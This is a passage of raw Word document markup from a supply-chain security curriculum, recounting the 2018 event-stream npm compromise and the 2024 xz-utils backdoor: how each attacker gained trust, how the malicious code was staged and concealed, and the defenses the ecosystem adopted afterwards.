        <w:t xml:space="preserve">In late 2018, researchers and the npm security team discovered that a widely-used Node.js package, event-stream, had been modified to include malicious code targeting the Copay Bitcoin wallet. The malicious code, in a dependency of event-stream called flatmap-stream, attempted to steal private keys from Copay wallets that had loaded the affected package version. Copay had fewer than twenty thousand users at the time, but event-stream itself had millions of weekly downloads — meaning the malicious code ran in millions of environments, even though it was targeted at a specific small subset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The story of how the compromise came to be is the interesting part for this curriculum. The original maintainer of event-stream, Dominic Tarr, had not actively maintained the package for years. He had written it as a personal project, it became popular, and — as often happens with volunteer-maintained packages — his interest in maintaining it waned over time. In September 2018, an unknown contributor going by "right9ctrl" approached Tarr and offered to take over maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tarr transferred control. The new maintainer made a couple of benign-seeming commits, then added flatmap-stream as a dependency. A few weeks later, flatmap-stream was updated to include the malicious Copay-targeting code. The malicious dependency was now transitively pulled in by millions of event-stream consumers. The attack went undetected for approximately two months before a researcher noticed unusual behavior and traced it back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 The Structural Failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">event-stream is distinct from SolarWinds (build-system compromise) and Codecov (tooling compromise). The mechanism here is maintainer ownership transfer — an attack vector specific to the open-source ecosystem and the social dynamics around volunteer maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tarr, the original maintainer, did nothing morally blameworthy. He had written an open-source tool, it had become popular beyond his interest in maintaining it, and he had transferred ownership to someone who offered to continue the work. From his perspective, this was responsible stewardship — better to transfer the package than to leave it unmaintained. The attacker exploited exactly this reasonable social dynamic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tarr wrote a widely-discussed post-mortem in which he described his reasoning. Some key excerpts from that description, paraphrased:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">He had maintained event-stream for free for years, with no compensation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">He had lost interest in the package and no longer used it himself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A stranger offering to take over maintenance seemed like a reasonable outcome.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">He had no particular reason to distrust the new maintainer; the community had not provided any mechanism for vetting maintainers, and the project's popularity did not correlate with any financial resources that would have supported vetting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The structural failure is therefore not in any single decision but in the system: a volunteer maintainer, with no support infrastructure, making a judgment call about a stranger, in a context where the stakes (millions of downstream consumers) were enormously mismatched to the support the maintainer was receiving (none).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 The Technical Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The technical attack pattern is worth studying separately from the social context. Once the attacker had control of event-stream, they did not immediately ship malicious code in event-stream itself — doing so would have been conspicuous. Instead, they:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added a new dependency (flatmap-stream) to event-stream — a routine change that did not trigger review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initially, flatmap-stream contained only benign code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Several weeks later, a minor version update to flatmap-stream introduced the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consumers of event-stream automatically picked up the flatmap-stream update via their normal dependency resolution (npm's lockfiles were less strict at the time, and many consumers were not using lockfiles at all).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This staggered approach — add the dependency innocuously first, then later malicious-ly — has become a documented pattern in subsequent incidents. The time lag between "dependency added" and "dependency weaponized" makes the attack much harder to detect via simple commit-level auditing. Someone reviewing the event-stream commits would have seen only a new dependency; the compromise happened in a different repository entirely, weeks later, after the dependency edge was already in place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 What event-stream Taught the Ecosystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Maintainer ownership is a trust edge. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The people who control a package's publication credentials are, effectively, trusted to write code that will run on every downstream consumer's system. Transferring those credentials is a trust-transfer that deserves more careful handling than it has typically received in ecosystems like npm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transitive dependencies are as trusted as direct ones. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Users of event-stream did not directly install flatmap-stream; they installed it transitively. But the malicious code ran with full privilege of whatever loaded event-stream. There is no 'trust gradient' — transitive dependencies are just as dangerous as direct ones if compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Staggered attacks defeat simple review. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The attacker split the attack across two repositories and weeks of time. No single commit audit at event-stream would have caught the attack. Effective defenses need to operate across the full dependency graph and across time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Popular packages deserve popular-package scrutiny. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">event-stream had millions of weekly downloads but no corresponding scrutiny. The social-capital imbalance — heavy usage, light support — is a systemic risk. Foundations like OpenSSF now fund maintenance of critical packages partly to address this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lockfiles matter. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Consumers using lockfiles with explicit pinned versions (and explicit integrity hashes) got malicious code only if they updated their lockfile. Consumers not using lockfiles (or using them weakly) got malicious code automatically when flatmap-stream was updated. This pushed the ecosystem toward more rigorous lockfile usage as a baseline practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 A Variant Pattern: Abandoned Package Takeover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">event-stream is the canonical example of an explicit ownership transfer. A related variant is the abandoned-package takeover: an attacker identifies a package whose maintainer has stopped responding, finds an avenue (typically via the registry's ownership-dispute process) to gain publication rights, and then pushes malicious versions. Variants of this attack have recurred in npm, PyPI, and RubyGems over the years.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The operational lesson is that 'a package is well-maintained' is not a static property; maintenance status can change silently, and the window when a package goes from 'maintained' to 'taken over by an attacker' can be short. Defensive tooling has grown to address this — npm's audit, GitHub's dependency alerts, Dependabot, Socket, and similar tools watch for unusual maintainer activity or suspicious changes across the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event-stream demonstrated that social attack vectors — maintainer ownership transfer, abandoned-package takeover — are as important as technical ones. A legitimate handoff from an overworked volunteer to a stranger gave an attacker millions of downstream consumers. The attacker staggered the attack across two packages and weeks of time to evade simple review. The lessons shaped modern ecosystem defenses: strict lockfiles, integrity hashes, dependency-surveillance tooling, and structural support for critical-package maintainers. The root problem — that open-source ecosystems have enormous usage but minimal infrastructure for vetting trust transfers — remains partially unsolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 6: xz-utils (2024) — The Long Con</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 The Most Sophisticated Publicly-Known Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In March 2024, Andres Freund — a Microsoft engineer working on PostgreSQL — reported an anomaly while investigating some unusually slow SSH connections and unexpected Valgrind errors on a development machine. His investigation traced the slowness to liblzma, a compression library maintained as part of the xz-utils project. Digging deeper, he discovered something remarkable: liblzma contained a backdoor, deliberately planted by a contributor who had spent years gradually working their way into a trusted position in the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The backdoor targeted OpenSSH, via a chain of linkages: systemd uses liblzma; sshd (when built with systemd notification support, as it is on most major Linux distributions) links in liblzma; the backdoor hooked into sshd's authentication path at runtime; an attacker presenting a specific cryptographic key could gain code execution as root on any machine running a backdoored version of sshd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Freund's discovery, published on March 29, 2024, was staggering for multiple reasons. The attack had been in development for approximately three years. It had reached the beta release channels of major Linux distributions (Fedora Rawhide, Debian Sid, openSUSE Tumbleweed, Kali Linux) but had not yet made it into widely-deployed stable releases when discovered. The attack was technically exquisite — layered obfuscation, trigger conditions designed to evade automated analysis, cryptographic keys held only by the attacker to prevent the backdoor from being exploited by anyone else. And the social engineering was sustained over years, across multiple personas, with careful cultivation of the trust required to land the compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 The Social Engineering Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The human story is as important as the technical one. Reconstructed from Freund's reports and subsequent community analysis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Around 2021: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an account named "Jia Tan" began contributing to xz-utils. The contributions were legitimate, useful, and sustained. Over the course of many months, Jia Tan built a record as a helpful regular contributor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2022–2023: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">coordinated pressure began on the project's existing maintainer (Lasse Collin) to share maintenance duties. This pressure came from multiple email addresses that the community later came to believe were either sock-puppet accounts operated by the same attacker or coordinating collaborators. They complained about release speed, criticized the existing maintenance, and suggested that Jia Tan (now established as a trusted contributor) should be promoted to co-maintainer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Late 2023: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jia Tan became a co-maintainer with commit and release rights. Collin's health and availability had been limited, and the pressure campaign had succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">February 2024: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a release tarball uploaded by Jia Tan contained the backdoor. The backdoor was not visible in the source tree (the git repository's visible contents) — it was injected through a combination of a malicious test file and build-system modifications that only activated during the release-tarball build process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">March 2024: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the compromised release was adopted by downstream distributions for their beta/testing channels. Stable releases had not yet incorporated it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">March 29, 2024: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Andres Freund's disclosure. Within hours, the xz-utils backdoor was a global security incident; distributions rapidly rolled back the compromised versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 The Technical Sophistication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The xz-utils backdoor is studied in security research for several specific technical innovations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-stage concealment. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The malicious code was not in the git source tree that anyone could review. It was injected through the distribution tarball, where additional files (labeled as test fixtures) contained the actual payload. The build system was subtly modified to extract and incorporate the payload during release builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-analysis countermeasures. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The backdoor included logic to detect and inhibit its activation under common analysis conditions — Valgrind, specific environment variables, certain system configurations. This was part of why Freund's investigation was initially so confusing; the backdoor behaved differently under his investigation than under normal attacker-targeted operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptographic authentication of the backdoor. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The backdoor was not a simple 'anyone with the exploit can use it' vulnerability. Triggering it required a signature from a specific cryptographic key held only by the attacker. This prevents other attackers from exploiting the backdoor and ensures that only the planner's operations would succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Targeted linkage exploitation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The backdoor's path to sshd relied on the fact that systemd-enabled Linux distributions build sshd with libsystemd-notify, which pulls in liblzma, which was backdoored. This is an extraordinarily indirect linkage that few defenders would have considered a threat surface — libraries for compression reaching into authentication paths via a notification library — yet it worked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 What xz-utils Demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xz-utils moved the ceiling on what supply chain defenses need to anticipate. Specific demonstrations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-year social engineering is a realistic threat. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Previous incidents involved months of preparation at most; xz-utils involved approximately three years. This changes the calculus of maintainer vetting — the set of contributors you can trust is not the set whose contributions have been benign for the last year, because patience is a weapon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source-tree audits are not sufficient. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The git source of xz-utils was not visibly malicious at the time of release. The backdoor was in the release tarball, constructed by build-system logic that used legitimate test fixtures as the delivery vehicle. Defenses that audit only source trees would not have caught this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproducible builds would have helped. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Had every xz-utils consumer been building from source rather than consuming the upstream tarball, the backdoor would not have been in their builds. Reproducible-build practices, covered in later modules, directly address this class of attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The open-source maintenance model is a vulnerability. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xz-utils had one active maintainer with health and personal-time limits. Under sustained pressure, he shared maintenance. This is the same structural problem as event-stream, now exploited with patience and sophistication. The ecosystem has still not solved it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection relied on luck. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Andres Freund was not looking for a backdoor. He was investigating a performance regression. He happened to be the kind of engineer who pulls on loose threads, and he happened to notice a hundred-millisecond SSH-connection slowdown that most people would have ignored. Counterfactually, the backdoor would have been in stable releases within a month or two. The entire defensive success depended on a single engineer's curiosity.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4"/>
              <w:right w:val="single" w:color="C00000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t xml:space="preserve">The counterfactual</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Had Freund not investigated, the xz-utils backdoor would likely have reached stable releases of every major Linux distribution within 2–3 months. Every Linux server running sshd with systemd notification support — which is essentially every production Linux server — would have had a backdoor exploitable by the attackers' specific key. The scale of this near-miss is difficult to overstate. Supply chain security became an executive-level concern again after SolarWinds; xz-utils reminded everyone, three years later, that the concern has not diminished.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 The Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The xz-utils incident catalyzed a new wave of investment and attention in supply chain defenses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Increased funding for critical-open-source maintenance (OpenSSF, Sovereign Tech Fund, corporate sponsorships).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accelerated adoption of reproducible builds in distribution pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Increased scrutiny of maintainer-addition processes for critical projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Research into static analysis tooling that can identify malicious patterns in build systems, not just source code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policy-level discussion of whether some critical infrastructure should require verifiable-provenance artifacts in the way that aviation parts require certified pedigree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
